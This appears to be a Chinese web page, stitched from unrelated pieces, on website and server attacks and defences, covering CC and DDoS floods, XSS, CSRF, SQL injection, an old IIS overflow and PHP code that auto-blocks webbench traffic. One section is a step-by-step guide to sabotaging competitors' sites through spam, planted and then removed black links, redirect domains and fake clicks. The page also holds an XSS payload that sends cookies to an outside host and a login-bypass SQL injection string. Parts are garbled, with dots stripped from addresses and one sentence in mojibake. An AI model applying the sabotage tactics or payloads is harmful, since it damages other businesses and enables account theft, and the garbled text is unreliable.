服务器、网站被攻击了怎么办？

服务器、网站攻击的情况经常发生，有的来自竞争对手的攻击，有的则来自不明人员的攻击，不管是来自哪里的攻击，都会对自身产生很大影响，需要我们做出及时、有针对性的防御，避免引起业务损失。

网络攻击一般分为3类

第1类：ARP欺骗攻击 ARP（Address Resolution Protocol，地址解析协议）是一个位于TCP/IP协议栈中的网络层，负责将某个IP地址解析成对应的MAC地址。 ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的进行。 ARP攻击的局限性 ARP攻击仅能在以太网（局域网如：机房、内网、公司网络等）进行，无法对外网（互联网、非本区域内的局域网）进行攻击。

第2类：CC攻击 相对来说，这种攻击的危害大一些。主机空间都有一个参数 IIS 连接数，当被访问网站超出IIS 连接数时，网站就会出现Service Unavailable 。攻击者就是利用被控制的机器不断地向被攻击网站发送访问请求，迫使IIS 连接数超出限制，当CPU 资源或者带宽资源耗尽，那么网站也就被攻击垮了。对于达到百兆的攻击，防火墙就相当吃力，有时甚至造成防火墙的CPU资源耗尽造成防火墙死机。达到百兆以上，运营商一般都会在上层路由封这个被攻击的IP。 针对CC攻击，一般的租用有防CC攻击软件的空间、VPS或服务器就可以了，或者租用章鱼主机，这种机器对CC攻击防御效果更好。

第3类：DDOS流量攻击 就是DDOS攻击，这种攻击的危害是最大的。原理就是向目标服务器发送大量数据包，占用其带宽。对于流量攻击，单纯地加防火墙没用，必须要有足够的带宽和防火墙配合起来才能防御。

服务器被攻击的解决方法

查看网站的服务器。 当我们发现网站被攻击的时候不要过度惊慌失措，先查看一下网站服务器是不是被黑了，找出网站存在的黑链，然后做好网站的安全防御，具体操作分为三步： 1）、开启IP禁PING，可以防止被扫描。 2）、关闭不需要的端口。 3）、打开网站的防火墙。 这些是只能防简单的攻击

ARP欺骗

网上现在有很多防御ARP欺骗的防护软件（这里不一一列举）

服务器被攻击CC攻击防御策略

取消域名绑定。 一般cc攻击都是针对网站的域名进行攻击，比如我们的网站域名是"wwwstar-netcn"，那么攻击者就在攻击工具中设定攻击对象为该域名然后实施攻击。 对于这样的攻击我们的措施是在IIS上取消这个域名的绑定，让CC攻击失去目标。具体操作步骤是：打开"IIS管理器"定位到具体站点右键"属性"打开该站点的属性面板，点击IP地址右侧的"高级"按钮，选择该域名项进行编辑，将"主机头值"删除或者改为其它的值(域名)。 经过模拟测试，取消域名绑定后Web服务器的CPU马上恢复正常状态，通过IP进行访问连接一切正常。但是不足之处也很明显，取消或者更改域名对于别人的访问带来了不变，另外，对于针对IP的CC攻击它是无效的，就算更换域名攻击者发现之后，他也会对新域名实施攻击。

域名欺骗解析。 如果发现针对域名的CC攻击，我们可以把被攻击的域名解析到127001这个地址上。我们知道127001是本地回环IP是用来进行网络测试的，如果把被攻击的域名解析到这个IP上，就可以实现攻击者自己攻击自己的目的，这样他再多的肉鸡或者代理也会宕机，让其自作自受。 另外，当我们的Web服务器遭受CC攻击时把被攻击的域名解析到国家有权威的政府网站或者是网警的网站，让其网警来收拾他们。 现在一般的Web站点都是利用IDC服务商提供的动态域名解析服务，大家可以登录进去之后进行设置。

更改Web端口。 一般情况下Web服务器通过80端口对外提供服务，因此攻击者实施攻击就以默认的80端口进行攻击，所以，我们可以修改Web端口达到防CC攻击的目的。运行IIS管理器，定位到相应站点，打开站点"属性"面板，在"网站标识"下有个TCP端口默认为80，我们修改为其他的端口就可以了。

IIS屏蔽IP。 我们通过命令或在查看日志发现了CC攻击的源IP，就可以在IIS中设置屏蔽该IP对Web站点的访问，从而达到防范IIS攻击的目的。在相应站点的"属性"面板中，点击"目录安全性"选项卡，点击"IP地址和域名现在"下的"编辑"按钮打开设置对话框。在此窗口中我们可以设置"授权访问"也就是"白名单"，也可以设置"拒绝访问"即"黑名单"。比如我们可以将攻击者的IP添加到"拒绝访问"列表中，就屏蔽了该IP对于Web的访问。

服务器被攻击CC攻击防御手段

防止CC攻击，不一定非要用高防服务器。比如，用防CC攻击软件就可以有效的防止CC攻击。推荐一些CC的防范手段：

优化代码。 尽可能使用缓存来存储重复的查询内容，减少重复的数据查询资源开销。减少复杂框架的调用，减少不必要的数据请求和处理逻辑。程序执行中，及时释放资源，比如及时关闭mysql连接，及时关闭memcache连接等，减少空连接消耗。

限制手段。 对一些负载较高的程序增加前置条件判断，可行的判断方法如下： 必须具有网站签发的session信息才可以使用（可简单阻止程序发起的集中请求）；必须具有正确的referer（可有效防止嵌入式代码的攻击）；禁止一些客户端类型的请求（比如一些典型的不良蜘蛛特征）；同一session多少秒内只能执行一次。

完善日志。 尽可能完整保留访问日志。日志分析程序，能够尽快判断出异常访问，比如单一ip密集访问；比如特定url同比请求激增。

使用第三方防护服务。 笔者试了很多的CC防御，最终还是选择使用知道创宇抗D宝，就使用体验来说，算是我使用很靠谱的CC防御产品了，对伪造搜索爬虫攻击、伪造浏览器攻击、假人攻击等效果很好。

流量攻击（DDoS攻击）防御策略

选择带有DDOS硬件防火墙的机房。 目前大部分的硬防机房对100G以内的DDOS流量攻击都能做到有效防护。选择硬防主要是针对DDOS流量攻击这一块的，如果你的企业网站一直遭受流量攻击的困扰，那你可以考虑将你的网站服务器放到DDOS防御机房。但是有的企业网站流量攻击超出了硬防的防护范围了，那就得考虑下面第二种了。

CDN和DDOS流量清洗防御。 目前大部分的CDN节点都有200G 的流量防护功能，在加上硬防的防护，可以说能应付目前绝大多数的DDOS流量攻击了。同时，CDN技术不仅对企业网站流量攻击有防护功能，而且还能对企业网站进行加速(前提要针对CDN节点位置)。解决部分地区打开网站缓慢的问题。笔者使用的CDN是知道创宇加速乐，用来加速和隐藏源站IP，DDOS流量洗使用的抗D宝，用来专门防止DDOS攻击的，目前使用效果还不错；

负载均衡技术。 这一类主要针对DDOS攻击中的CC攻击进行防护，这种攻击手法使web服务器或其他类型的服务器由于大量的网络传输而过载，一般这些网络流量是针对某一个页面或一个链接而产生的。当然这种现象也会在访问量较大的网站上正常发生，但我们一定要把这些正常现象和分布式拒绝服务攻击区分开来。在企业网站加了负载均衡方案后，不仅有对网站起到CC攻击防护作用，也能将访问用户进行均衡分配到各个web服务器上，减少单个web服务器负担，加快网站访问速度。

首先我来说一下这个被攻击的网站的大概部署状况这个网站主要是nginx+mysql+php,有两台服务器分别放了web和数据库,web只对外开启了80端口操作系统是centos,而数据库服务器则在内网,攻击者的手段其实很简单,用webbench网站压力测试工具发送大量的请求到服务器,之前的时候发送每一个请求之后数据库就会相应,然后读取内容最终显示,造成数据库和web之间大量的交换数据,甚至导致mysql达到连接数上限,请求被拒绝,而且攻击者时间挺多的,他不停地换浮动ip,因此直接用防火墙封锁ip没意义

刚开始我的做法是,用php取得攻击者的agent头,判断是不是webbench来访,如果是就die掉,不在请求数据库,确实挺有效,数据库不会再超出限制了,但是对方频繁的发送请求过来,导致网络带宽被严重消耗,看来得想想其他办法,最终想到了一个解决方法且实际测试发现可行,因此分享给大家,其实我的做法原理很简单:用php取得用户agent头判断是否是webbench来源,如果是的话就在服务器上写一个shell文件,这个文件的内容就是封锁IP的规则,

然后再用chmod函数修改一下这个文件让其可执行,再用cron服务读取这个文件执行,把ip封锁掉,整个过程全部自动化完成不需要人为干预,另外在封锁的时候给我发一封email通知我有个倒霉蛋被干掉了,这样就行了

具体实现代码如下:

IF(isSet($_SERVER['HTTP_USER_AGENT']) And Trim($_SERVER['HTTP_USER_AGENT'])!='') {

$_SERVER['HTTP_USER_AGENT']=StrToLower($_SERVER['HTTP_USER_AGENT']);

IF(StriStr($_SERVER['HTTP_USER_AGENT'],'webbench')!==False) {

$p='/home/www/webbenchsh';

$_SERVER['REMOTE_ADDR']=isSet($_SERVER['REMOTE_ADDR']) $_SERVER['REMOTE_ADDR'] : 'unknow';

span style="color: #ff0000;"File_Put_Contents($p,"#!/bin/bashniptables -I INPUT -s {$_SERVER['REMOTE_ADDR']} -j DROP;n",LOCK_EX);

/span     Chmod($p,0755);

chown($p,'www');

span style="color: #ff0000;"Function sMail($to,$tit,$msg) {

IF(Filter_var($to,FILTER_VALIDATE_EMAIL)==''){

throw new Exception('邮箱地址错误!');

}

$tit='=UTF-8B'Base64_Encode($tit)'=';

$msg = str_replace("n","n",$msg);      //Windows如果在一行开头发现一个句号则会被删掉,要避免此问题将单个句号替换成两个句号

Return Mail($to,$tit,$msg,'From:No-reply@admbossadmcomtw'"n"'Content-Type:text/html;charset=utf-8');

}

sMail('see7di@gmailcom','WebBench又开始了t!',date('Y-m-d H:i:s',time())" {$_SERVER['REMOTE_ADDR']}");/span

Header('Location:http://127001');

Die();

}

}

后来我又做了一次调整,把发email的部份写入了shell文件内,不再用php发email,因槟腔峁啾愕男畔把上边的代码修改成:

IF(isSet($_SERVER['HTTP_USER_AGENT']) And Trim($_SERVER['HTTP_USER_AGENT'])!='') {

$_SERVER['HTTP_USER_AGENT']=StrToLower($_SERVER['HTTP_USER_AGENT']);

IF(StriStr($_SERVER['HTTP_USER_AGENT'],'webbench')!==False) {

$p='/home/www/webbenchsh';

$_SERVER['REMOTE_ADDR']=isSet($_SERVER['REMOTE_ADDR']) $_SERVER['REMOTE_ADDR'] : 'unknow';

File_Put_Contents($p,"#!/bin/bashniptables -I INPUT -s {$_SERVER['REMOTE_ADDR']} -j DROP;necho "{$_SERVER['REMOTE_ADDR']} - `date`" | mail -s "WebBench-wwwdowncccom" see7di@gmailcomn",LOCK_EX);

Chmod($p,0755);

chown($p,'www');

Header('Location:http://127001');

Die();

}

}

网站被人恶意攻击时该怎么办？

网站被攻击一般有几种情况

1，流量攻击，就是我们常说的DDOS和DOS等攻击，这种攻击属于最常见的流量攻击中的带宽攻击，一般是使用大量数据包淹没一个或多个路由器、服务器和防火墙，使你的网站处于瘫痪状态无法正常打开。

2，CC攻击，也是流量攻击的一种，CC就是模拟多个用户（多少线程就是多少用户）不停地进行访问那些需要大量数据操作（就是需要大量CPU时间）的页面，造成服务器资源的浪费，CPU长时间处于100%，永远都有处理不完的连接直至就网络拥塞，正常的访问被中止。而CC攻击基本上都是针对端口的攻击，以上这两种攻击基本上都属于硬性流量的攻击如果服务器（网站）被入侵了,一般都是服务器或者网站存在漏洞，被黑客利用并提权入侵的，导致服务器中木马，网站被挂黑链，被篡改，被挂马。解决办法：如果程序不是很大，可以自己比对以前程序的备份文件，然后就是修复，或者换个服务器，最好是独立服务器。

入侵并破坏钓鱼网站、挂马网站犯法吗？如何收集此类网站？

《刑法》第二百八十六条违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。

我的电脑经常会自动弹出一些不良网页？

出现你说的问题，很可能是在浏览网页时中了某些网站的木马后门或是强迫安装的恶意软件（总是在不知道的情况下安装的），危害不至于使系统崩溃，但频频弹出的网站总让人心烦。解决问题之前要先了解一下出现这种问题是在什么时候开始的。以下是简单的排除方法。

1找根源。首先在IE属性里把主页设为使用空白页，强迫安装的恶意软件往往安装在c盘的ProgramFiles文件夹里，右键排列图标→修改时间，看看排在最后的几个文件夹有没有可疑的（也就是自己不了解的），这些软件往往在开启电脑或IE时启动，并一直隐藏在进程里。

2解决。如果有可疑软件就及时卸载掉，若普通卸载方法无法卸载干净，就需要使用第三方软件，如：windows系统优化大师（可以在华君软件园里下载到）的软件智能卸载。一般一些问题不大的恶意软件卸载后系统就正常了，但也有一些恶意软件可以自我复制，那样就比较麻烦，需要动用杀毒软件查杀和其他方法解决。

3预防。解决小的麻烦后，建议下载防火墙软件，来阻拦恶意软件，以防类似问题发生。以上解决方法只适合一般的网页恶意软件导致的网页弹出问题，仅供参考，祝你好运！

网站被提示存在风险怎么办？

可以在腾讯安全中心进行申诉，说明自己的网站性质。建议先排查一下网站有没有木马。

一：攻击服务器

许多人喜欢攻击别人服务器，删除、修改别人网站，或者让服务器变得很慢，从而让浏览者、蜘蛛的体验度都下降，导致被降权，达到搞垮别人站的目的。这个最常见，防范手段也很成熟了。

二：群发

或许有人以为这个不可能，其实是可以的，但是要注意技巧：

1：一直坚持，是不是群发一下，顺便带上敏感字，主要在百度的眼皮底下多做，比如知道、贴吧、博客

2：带网址就带首页，能删除的尽量发布一段时间后又删除。

3：可以配合此方法给对方挂黑链，但是关键词要是敏感的（就找他们站上有的，相对敏感的，一般站时不时都会出现），挂玩之后，几天后被百度蜘蛛逛过，再立即拿除。

注意：保持此站外链的极端不稳定，如果是新站，百度会立即放入沙盒或者延长沙盒期。如果是老站，此方法基本无效，但是对目标站也没有什么好处。老站如果被降权（虚弱时）用此方法，甚是有效。

三：友情链接

和对方站做友情链接，链接词B。再偷偷在自己站首页title、描述里面加上公认的敏感词A，再在自己的首页、内容页多出现AB连词关键字，再刷下百度，多搜索关键词“AB”。

最后，大量通过锚文本链接“敏感词A”到对方站！具体细节自行研究，思路相信大家都清晰了。

四：黑链手段大幅度颠簸——充分利用链接的稳定性

就是保持目标站的链接十分不稳定，反正链接时间少于1个月，基本是没有用的。搞100个黑链，一周后拿除，一周后放上只要是权重不高的站，百度对其信任度将大降！

五：多域名其转向-晕头转向

申请3个域名，转向到目标站，和目标站一样做推广，一样的关键词链接，久而久之，百度会判断大家是一个站。

如果权重不够高，目标站在这一步就会被降权了。

之后再将这几个站指向垃圾站，并用诸多作弊手段去优化，同时利用前面说到的第三种方法：友情链接。

申请的三个站是A B C  对方站是D，我们与D友情连接的是E，那么，做以下链接：

ABC同时链接D、E，D链接了E，我们再用E链接ABCD四个站。这样四个站就绑成一伙了。只要E站不出问题，比如快照新、排名好，这些只是表象，其实它已经严重威胁D站的健康。只要多更新原创，E站的快照新、收录多是没有问题的。

六：恶意点击

模拟点击、换IP、刷排名。同时故意多换IP、故意拉长时间、故意只点击某一个排名、故意点击过后就关闭(品牌战略网wwwbrhnncom 以前就被人用这样的方法攻击

Web服务器将成为下一代黑客施展妖术的对象。在很大程度上，进行这种攻击只需一个Web浏览器和一个创造性的头脑。以前，黑客的攻击对象集中在操作系统和网络协议上，但随着这些攻击目标的弱点和漏洞逐渐得到修补，要进行这类攻击已经变得非常困难。操作系统正在变得更加稳健，对攻击的抵抗能力日益提高。随着身份验证和加密功能渐渐被内置到网络协议中，网络协议也变得更加安全。此外，防火墙也越来越智能，成为网络和系统的外部保护屏障。

　　　　另一方面，电子商务技术正在日益普及开来，其复杂性有增无减。基于Web的应用程序正在与基本的操作系统和后端数据库更加紧密地集成在一起。遗憾的是，人们在基于Web的基础设施安全性方面所做的工作还很不够。Web服务器和Web应用程序中的弱点被发现的速度为何这么快呢

　　　　有很多因素促成了这种Web黑客活动的快速增加。其中最主要的原因是防火墙允许所有的Web通信都可以进出网络，而防火墙无法防止对Web服务器程序及其组件或Web应用程序的攻击。第二个原因是，Web服务器和基于Web的应用程序有时是在“功能第一，安全其次”的思想指导下开发出来的。

　　　　当您的Web服务器面临巨大威胁时，怎样保障它们的安全呢这就需要您不断了解新信息，新情况，每天跟踪您所用服务器的有关网站，阅读相关新闻并向它进行咨询。为了让你着手这方面的工作，下面介绍黑客对NT系统的四种常用攻击手段，同时介绍如何防止这类攻击。

　　Microsoft IIS ismdll缓冲区溢出受影响的服务器：运行IIS 40并带有“Service Pack 3/4/5”的Windows NT服务器　　MicrosoftIIS缓冲区溢出这一安全弱点是Web服务器无时不有的重大缺陷之一。该弱点被称为IIS eEye，这个名称来自发现此问题的一个小组。在实施缓冲区溢出攻击时，黑客向目标程序或服务输入超出程序处理能力的数据，导致程序突然终止。另外，还可以通过设置，在执行中的程序终止运行前，用输入的内容来覆盖此程序的某些部分，这样就可以在服务器的安全权限环境下执行任意黑客命令。

　　　　eEye发现，IIS用来解释HTR文件的解释程序是ismdll，它对缓冲区溢出攻击的抵抗力十分脆弱。如果攻击者将一个以htr结尾的超长文件名(大约3,000个字符，或更多)传递给IIS，那么输入值将在ismdll中造成输入缓冲区溢出，并导致IIS崩溃。如果攻击者输入的不是一串字母而是可执行代码(通常称为“鸡蛋”或“外壳代码”)，那么在IIS终止之前将执行该代码。由eEye小组发现的这一攻击方法

　　包括三个步骤：

　　1创建一个用于侦听任意TCP端口上连接活动的程序。一旦接收到连接信号，该程序将执行一个Windows命令外壳程序(cmdexe)，并将该外壳与连接绑定在一起。这个程序是经过修改的Netcat。Netcat是一个流行的网络连接实用程序，其源代码可以免费获得。

　　2在IIS的ismdll中制造缓冲区溢出，并使IIS从外部Web站点下载侦听程序(由步骤1产生)。

　　3执行刚下载的程序(由步骤2产生)，该程序将等待传入的连接并使攻击者进入Windows命令外壳程序中。

　　　　由于缓冲区溢出导致IIS在崩溃之前转而运行Windows命令外壳，所以该外壳程序将在IIS的安全权限背景下运行，而该安全权限背景等价于NT Administrator权限。这样，攻击者要做的只是与被攻击的IIS服务器的侦听端口建立连接，然后等着出现c:>提示就万事大吉了。现在，攻击者拥有对整个NT服务器的管理权限，可以做任何事，比如，添加新用户、修改服务器的内容、格式化驱动器，甚至将该服务器用作攻击其它系统的踏脚石。

　　　　运行IIS 40并带有“Service Pack 3/4/5”的Windows NT服务器容易受到此类攻击。Microsoft已经发布了对该弱点的修补程序。Windows NT Service Pack 6也已经修补了该问题。

原理：1登录受信任网站A，并在本地生成Cookie。

            2在不登出A的情况下，访问危险网站B,引诱点击链接，实际上是调用A网站的链接，或者是接口地址，利用A的cookie未失效。

触发条件：A网站存在漏洞，用户在A网站登录过且cookie未失效

预防：token认证，访问网站，登录成功后，服务器生成token，存放在cookie里，session，或者本地，在访问接口的时候要求把token带上，到服务器端在验证（token最好是随机的，不可预测的）

         referer认证，页面来源（在hearder里），服务器判断是否是本站点下的页面，如果不是直接拦截。

XSS：跨站脚本攻击，不需要登录，向网站注入脚本（盗用cookie，改变页面的dom结构，重定向链接）。

博客网站，攻击者在上面发了一篇文章，内容是<script>windowopen(“wwwxxxcomparam=”+documentcookie)</script>浏览器运行非法的html 标签/Javascript,用户下次访问就会把cookie发送到攻击者的服务器上。

预防：将输入的数据进行转义处理，比如说讲 < 转义成&lt

SQL注入：sql语句伪造参数，

最常见的就是：' or '1'= '1。这是最常见的sql注入攻击，当我们输如用户名 jiajun ，然后密码输如'or '1'= '1的时候，我们在查询用户名和密码是否正确的时候，本来要执行的是select from user where username='' and password='',经过参数拼接后，会执行sql语句 select from user where username='jaijun' and password=' ' or ' 1'='1 '，这个时候1=1是成立，自然就跳过验证了。

预防：接口可以对采纳数进行转义，密码什么的敏感信息要加密

SYN Flood ,简单说一下tcp三次握手，客户端先服务器发出请求，请求建立连接，然后服务器返回一个报文，表明请求以被接受，然后客户端也会返回一个报文，最后建立连接。那么如果有这么一种情况，攻击者伪造ip地址，发出报文给服务器请求连接，这个时候服务器接受到了，根据tcp三次握手的规则，服务器也要回应一个报文，可是这个ip是伪造的，报文回应给谁呢，第二次握手出现错误，第三次自然也就不能顺利进行了，这个时候服务器收不到第三次握手时客户端发出的报文，又再重复第二次握手的操作。如果攻击者伪造了大量的ip地址并发出请求，这个时候服务器将维护一个非常大的半连接等待列表，占用了大量的资源，最后服务器瘫痪。

预防：增加服务器带宽。

一种针对域名服务器的新型分布式拒绝服务攻击（DDoS），可称之为“胡乱域名”（Nonsense Name）攻击。它能给递归域名服务器和权威域名服务器（authoritative name servers）造成严重破坏。这种“无意义域名”DDoS攻击通常是这样进行的：

1攻击者选定一个域作为目标，比如someoneexample。

2 在目标域内，攻击者操纵僵尸网络产生大量随机域名。这些随机域名的头部都是些诸如asdfghjk、zxcvbnm之类的无意义的字符，制造出来的域名形如：asdfghjksomeoneexample和zxcvbnmsomeoneexample。

3然后向递归域名服务器发起大量针对这些无意义域名的查询请求。

4递归域名服务器转而将请求发送到someoneexample的权威服务器以查询这些域名。

5 权威域名服务器返回‘请求的域名不存在’的响应（NXDOMAIN）。

6 递归服务器中继转发这一响应给原始请求者，并缓存下域名不存在的记录。

7 请求，响应，缓存，再来一遍。反反复复无穷尽。

大多数情况下，运营权威域名服务器的机构（本例中是为someoneexample提供权威域名解析的）似乎是攻击者的目标。比如说，我们观察到的某些被攻击的域名就是国内博彩网站使用的（也许是有人因为损失惨重而对庄家进行报复？）无论如何，递归服务器终归是无辜中箭，连带崩溃。他们确实是目标么？

比如之前，Infoblox的客户遭受攻击的域中有部分在攻击过后神秘消失了一天或两天，表明这些域并没有被使用（事实上很可能是被“试探性抢注”了）。攻击者可能故意将这些域注册到慢速或停止响应的域名服务器上，这样域内的域名解析就会无限漫长，比如com、top、cn等等域名。当然，抛开目标问题不谈，攻击背后的机制也同样迷雾重重。

1首先你的服务器的IP地址被别人扫描到了，就一定存在漏洞。

2别人可以利用你的漏洞进行注入，木马。

3当中了木马后别人可以猜解出你的管理员的名单及密码，然后提升权限到最高。

4进入后台数据库找想要的东西。

5安装后门，以便下次在进，他会用软件删除他的痕迹，并且隐藏他的木马不让你发现。